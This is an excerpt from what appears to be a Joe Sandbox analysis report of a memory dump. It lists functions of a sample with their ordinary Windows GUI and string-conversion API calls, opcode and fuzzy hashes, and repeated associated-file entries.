Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: TaskDialogIndirect$comctl32.dll
API String ID: 2061474489-2809879075
Opcode ID: cbe80a77a5e590cdf4cecb7306e8b4c550215d01dba15b65c542bf1c501508ec
Instruction ID: bbe98a334ce4f01608d5e785eb16022adea77c918e8734b8c804a58c7b6062a8
Opcode Fuzzy Hash: cbe80a77a5e590cdf4cecb7306e8b4c550215d01dba15b65c542bf1c501508ec
Instruction Fuzzy Hash: 67E09239F17661AFEB021E74A9085B73EBCDB0B2593090860BD05E7504EA29CC0289A1

Function 6CB2DB5B Relevance: 10.5, APIs: 7, Instructions: 25COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 6CB2DB60
GetSysColor.USER32(00000010), ref: 6CB2DB6B
GetSysColor.USER32(00000014), ref: 6CB2DB76
GetSysColor.USER32(00000012), ref: 6CB2DB81
GetSysColor.USER32(00000006), ref: 6CB2DB8C
GetSysColorBrush.USER32(0000000F), ref: 6CB2DB97
GetSysColorBrush.USER32(00000006), ref: 6CB2DBA2

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: e693aecd74dcbda3a9f24338dba47d5b10e7c496e979f74ce1e004a09a6f517d
Instruction ID: f70a22830acaecff68046cff043d5db772fa55f8dfe92b678ab7e3368c89f959
Opcode Fuzzy Hash: e693aecd74dcbda3a9f24338dba47d5b10e7c496e979f74ce1e004a09a6f517d
Instruction Fuzzy Hash: C9F09EB1A427409FDB216FB5864D747FEB0BF1AB11F042919E2468FA84D775D0409F00

Function 6CB3C6FD Relevance: 9.4, APIs: 6, Instructions: 445COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB3C704

Part of subcall function 6CB28CB2: GetWindowTextLengthW.USER32(?), ref: 6CB28CC3
Part of subcall function 6CB28CB2: GetWindowTextW.USER32(?,00000000,00000000), ref: 6CB28CDA

InflateRect.USER32(?,?,?), ref: 6CB3C85E
SetRectEmpty.USER32(?), ref: 6CB3C86A
InflateRect.USER32(?,00000000,00000000), ref: 6CB3C916
OffsetRect.USER32(?,00000001,00000001), ref: 6CB3C9D3
IsRectEmpty.USER32(?), ref: 6CB3CA80

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$EmptyInflateTextWindow$H_prolog3_LengthOffset
String ID:
API String ID: 2648887860-0
Opcode ID: 1d1f196fccef0906ca936983dd75703d522e710deedf7a29e74f3cc691cdcfbb
Instruction ID: 9c40bfe26d1ed8e5b423c1c2cfeb88b7b8740fa619f308b1fe187a1fd66daff7
Opcode Fuzzy Hash: 1d1f196fccef0906ca936983dd75703d522e710deedf7a29e74f3cc691cdcfbb
Instruction Fuzzy Hash: 2BF18E71E002698FDF04DFE8C894BED77B6EF48304F185279E819AB694EB34A905CB51

Function 6CC67BE9 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000000,?,6CB997B2,?,?,?,6CC67E3A,00000001,00000001,9F418D08), ref: 6CC67C43
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6CC67E3A,00000001,00000001,9F418D08,00000000,?,?), ref: 6CC67CC9
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,00000000,9F418D08,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6CC67DC3
__freea.LIBCMT ref: 6CC67DD0

Part of subcall function 6CC63481: HeapAlloc.KERNEL32(00000000,?,?,?,6CB1A014,?,00000001,?,?,6CB00D34,?), ref: 6CC634B3

__freea.LIBCMT ref: 6CC67DD9
__freea.LIBCMT ref: 6CC67DFE

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocHeap
String ID:
API String ID: 3147120248-0
Opcode ID: 9ee5807cb01244832656430541100c2305a2ccd7bcfae2b6820c3adb322f3a61
Instruction ID: b380cf571ea40a8fd256a3e00b834861cddba1d8097ae2c0863c0b1ee2639845
Opcode Fuzzy Hash: 9ee5807cb01244832656430541100c2305a2ccd7bcfae2b6820c3adb322f3a61
Instruction Fuzzy Hash: 3851E172A00216ABEB158F66CEC0EBB37E9EB41758B254E68FD14D6D40FB34DC449790

Function 6CB37A45 Relevance: 9.2, APIs: 6, Instructions: 155windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB37A4C
CoTaskMemFree.OLE32(?,000000FF,?), ref: 6CB37B18
GetParent.USER32(?), ref: 6CB37B93
SendMessageW.USER32(?,00000464,00000104,00000000), ref: 6CB37BA9
GetParent.USER32(?), ref: 6CB37BDB
SendMessageW.USER32(?,00000465,00000104,00000000), ref: 6CB37BF1

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageParentSend$FreeH_prolog3Task
String ID:
API String ID: 526180827-0
Opcode ID: 3339821eab087e48fb4ba4f44aa3feb1119d3ac08be9aa6dfca05f206ce1a7e4
Instruction ID: d2b2c9423697743bf595a6ee77f4a04aea346a34dd9557956766c6992d2cdb3c
Opcode Fuzzy Hash: 3339821eab087e48fb4ba4f44aa3feb1119d3ac08be9aa6dfca05f206ce1a7e4
Instruction Fuzzy Hash: C4519171A00166DFCF14DFA4C994EAEB775FF05358B100618E165B7BA0EB30A909CBA5

Function 6CB467B4 Relevance: 9.1, APIs: 6, Instructions: 148windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 6CB46811
SendMessageW.USER32(?,0000120C,00000000,00000001), ref: 6CB46856
SendMessageW.USER32(?,0000120C,00000001,00000001), ref: 6CB46885
SendMessageW.USER32(?,00000201,00000000,00000000), ref: 6CB4690A
SendMessageW.USER32(?,00000202,00000000,00000000), ref: 6CB46926
PtInRect.USER32(?,?,?), ref: 6CB46946

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$Rect$Client
String ID:
API String ID: 4194289498-0
Opcode ID: d12be60f223f13472a2cfd4c51dfedda0a348e18d8346b0d1679ccb731ff3627
Instruction ID: e8c4a1c88a20b4bc3416d257621a9ccd8b7c0a027608e7bf1d991daaf13e5029
Opcode Fuzzy Hash: d12be60f223f13472a2cfd4c51dfedda0a348e18d8346b0d1679ccb731ff3627
Instruction Fuzzy Hash: C2519E71A00244DFCF01DF68C888EAE7BB9FF89700F1441AAE804EB265DB71EA15CB51

Function 6CB50AD3 Relevance: 9.1, APIs: 6, Instructions: 140windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000100,?,00000000), ref: 6CB50B5A
SendMessageW.USER32(?,0000020A,?,?), ref: 6CB50BDD
IsWindow.USER32(?), ref: 6CB50C02
ClientToScreen.USER32(?,?), ref: 6CB50C13
IsWindow.USER32(?), ref: 6CB50C30
ClientToScreen.USER32(?,?), ref: 6CB50C63

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ClientMessageScreenSendWindow
String ID:
API String ID: 2093367132-0
Opcode ID: 823ae1cfae67fd5a19bda3c7732af469a9f17f4bae0e4cf501a4a7ae2265745b
Instruction ID: dc59539ee3796dc12a735aa65044da10dd490ebd32dc7eef9388e323b5b58e6c
Opcode Fuzzy Hash: 823ae1cfae67fd5a19bda3c7732af469a9f17f4bae0e4cf501a4a7ae2265745b
Instruction Fuzzy Hash: 8341F331E012C1AEEB108FE4ECD5B6E7AB9EF0930CFA0052AE455D2D60D775C861C602

Function 6CB3FED7 Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB3FEDE

Part of subcall function 6CB2512A: __EH_prolog3.LIBCMT ref: 6CB25131
Part of subcall function 6CB2512A: GetWindowDC.USER32(00000000,00000004,6CB50443,00000000), ref: 6CB2515D

GetWindowRect.USER32(?,?), ref: 6CB3FF1A
GetClientRect.USER32(?,?), ref: 6CB3FF55

Part of subcall function 6CB25BCB: ClientToScreen.USER32(?,?), ref: 6CB25BDA
Part of subcall function 6CB25BCB: ClientToScreen.USER32(?,?), ref: 6CB25BE7

OffsetRect.USER32(?,?,00000000), ref: 6CB3FF75
OffsetRect.USER32(?,?,?), ref: 6CB3FFAB
CreateRectRgnIndirect.GDI32(?), ref: 6CB3FFC4

Part of subcall function 6CB261BD: SelectClipRgn.GDI32(?,00000000), ref: 6CB261DD
Part of subcall function 6CB261BD: SelectClipRgn.GDI32(?,00000000), ref: 6CB261F3

Part of subcall function 6CB2617E: ScreenToClient.USER32(?,?), ref: 6CB2618D
Part of subcall function 6CB2617E: ScreenToClient.USER32(?,?), ref: 6CB2619A

Part of subcall function 6CB25395: ReleaseDC.USER32(?,00000000), ref: 6CB253C9

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ClientRect$Screen$ClipOffsetSelectWindow$CreateH_prolog3H_prolog3_IndirectRelease
String ID:
API String ID: 2381714760-0
Opcode ID: 2e3a21b9c5a0d8294a1670c0756a7e53b0a2fee470fdbccf0f64dd26b92ab506
Instruction ID: f1fdc88b847ced676507370a37c6138b2e3b44a6826a2fbd6acc1de1e9a056bc
Opcode Fuzzy Hash: 2e3a21b9c5a0d8294a1670c0756a7e53b0a2fee470fdbccf0f64dd26b92ab506
Instruction Fuzzy Hash: EB41F771D00619DFCF05DFA8C888AEEBBB9FF09304F144119E819AB251DB756A0ACF94

Function 6CB7F88F Relevance: 9.1, APIs: 6, Instructions: 102windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 6CB7F8AD
_wcslen.LIBCMT ref: 6CB7F8C5
SendMessageW.USER32(00000000,00000439,00000000,?), ref: 6CB7F8F2
SendMessageW.USER32(?,00000410,00000000,?), ref: 6CB7F938
ScreenToClient.USER32(00000000,?), ref: 6CB7F960
SendMessageW.USER32(?,00000407,00000000,?), ref: 6CB7F988

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$ClientScreenWindow_wcslen
String ID:
API String ID: 1233001418-0
Opcode ID: 2669878a9f18bf6867b1447f3e8edb459303c15708ded2fcf4e1e76478f37868
Instruction ID: 79d84c407a024452db7868bf481482a51989032a07239c41a874e52db7bee443
Opcode Fuzzy Hash: 2669878a9f18bf6867b1447f3e8edb459303c15708ded2fcf4e1e76478f37868
Instruction Fuzzy Hash: 8A319272A01218BBDB14CFA5CC44AEEBBB8FB49320F10015AFE15A7680D770ED15CBA4

Function 6CB4054A Relevance: 9.1, APIs: 6, Instructions: 101windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 6CB40555
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 6CB40576
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 6CB4058A
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 6CB405B7
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 6CB405CB
__EH_prolog3.LIBCMT ref: 6CB405E5

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$H_prolog3Window
String ID:
API String ID: 3728102838-0
Opcode ID: 49a13f3d30e33b449c8878329ad8b59583f7923c90b94f519082b042cc309788
Instruction ID: 649fcdbc82d04cd6b377e16681ec32fcdce7fd1ea3d21a52cf7a1ddb83d6654a
Opcode Fuzzy Hash: 49a13f3d30e33b449c8878329ad8b59583f7923c90b94f519082b042cc309788
Instruction Fuzzy Hash: 7031D231605165BBDB149F64CC889EFBB79FF06364B104229F405A3B90DB60AD14DBA5

Function 6CB2B2EF Relevance: 9.1, APIs: 6, Instructions: 89windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 6CB2B310
GetWindow.USER32(?,00000005), ref: 6CB2B327
GetWindowRect.USER32(00000000,00000000), ref: 6CB2B34B

Part of subcall function 6CB2617E: ScreenToClient.USER32(?,?), ref: 6CB2618D
Part of subcall function 6CB2617E: ScreenToClient.USER32(?,?), ref: 6CB2619A

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000015,00000000), ref: 6CB2B371
GetWindow.USER32(00000000,00000002), ref: 6CB2B37A
ScrollWindow.USER32(?,?,?,?,?), ref: 6CB2B396

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$ClientScreen$RectScrollVisible
String ID:
API String ID: 1714389229-0
Opcode ID: eec820c49254b3631c0b830b0abca731cb49bbb6314993325177352f913d0b2b
Instruction ID: a8c137b9eb274f8d2d4f6178463e80cca68c17b213a88b6ed5bb67ebab5f7a7e
Opcode Fuzzy Hash: eec820c49254b3631c0b830b0abca731cb49bbb6314993325177352f913d0b2b
Instruction Fuzzy Hash: 9931AE32600609AFDB01CF54CC88BBF7BB9FF89325F144418E909A7210EB34E9148B51

Function 6CB4F61E Relevance: 9.1, APIs: 6, Instructions: 84windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB4F625
CreateRectRgnIndirect.GDI32(?), ref: 6CB4F644

Part of subcall function 6CB261BD: SelectClipRgn.GDI32(?,00000000), ref: 6CB261DD
Part of subcall function 6CB261BD: SelectClipRgn.GDI32(?,00000000), ref: 6CB261F3

GetParent.USER32(?), ref: 6CB4F664
DrawThemeParentBackground.UXTHEME(?,00000000,?,00000000,?,?,00000018,6CB3CCB6,?,?,?), ref: 6CB4F685
MapWindowPoints.USER32(?,-00000001,?,00000001), ref: 6CB4F6B2
SendMessageW.USER32(?,00000014,00000000,-00000001), ref: 6CB4F6DD

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ClipParentSelect$BackgroundCreateDrawH_prolog3IndirectMessagePointsRectSendThemeWindow
String ID:
API String ID: 935984306-0
Opcode ID: ed5fc5d55673089c3d0c1af25e34733311497a460dc01e04c3e65369e4a7d6c0
Instruction ID: d476e367236abf46e54c4007895c29327d522013b9ae88beede7639257eb5d7c
Opcode Fuzzy Hash: ed5fc5d55673089c3d0c1af25e34733311497a460dc01e04c3e65369e4a7d6c0
Instruction Fuzzy Hash: 413138B6E0015AABCF00CF94C948AEEBBB5FF09344F044159E918AB664DB359A04DBA0

Function 6CB40E44 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB40E4B

Part of subcall function 6CB2D728: IsWindowEnabled.USER32(?), ref: 6CB2D733

InvalidateRect.USER32(?,00000000,00000001,0000000C), ref: 6CB40E77
UpdateWindow.USER32(?), ref: 6CB40E80

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$EnabledH_prolog3InvalidateRectUpdate
String ID:
API String ID: 262192325-0
Opcode ID: e854faedc5b3edb6f4748b07bb77c6927d6014027fe717f3c3d4a619de709d56
Instruction ID: 713da777d753e7c7fe7563d84d3cb7930dd8c7e1f56fdb052736bc709b5bc849
Opcode Fuzzy Hash: e854faedc5b3edb6f4748b07bb77c6927d6014027fe717f3c3d4a619de709d56
Instruction Fuzzy Hash: E121A171908284ABCB11DF78C858EAFBBB8FF89304B00492CE05A97B50DB35A904CF21

Function 6CB1DE75 Relevance: 9.1, APIs: 6, Instructions: 66COMMON

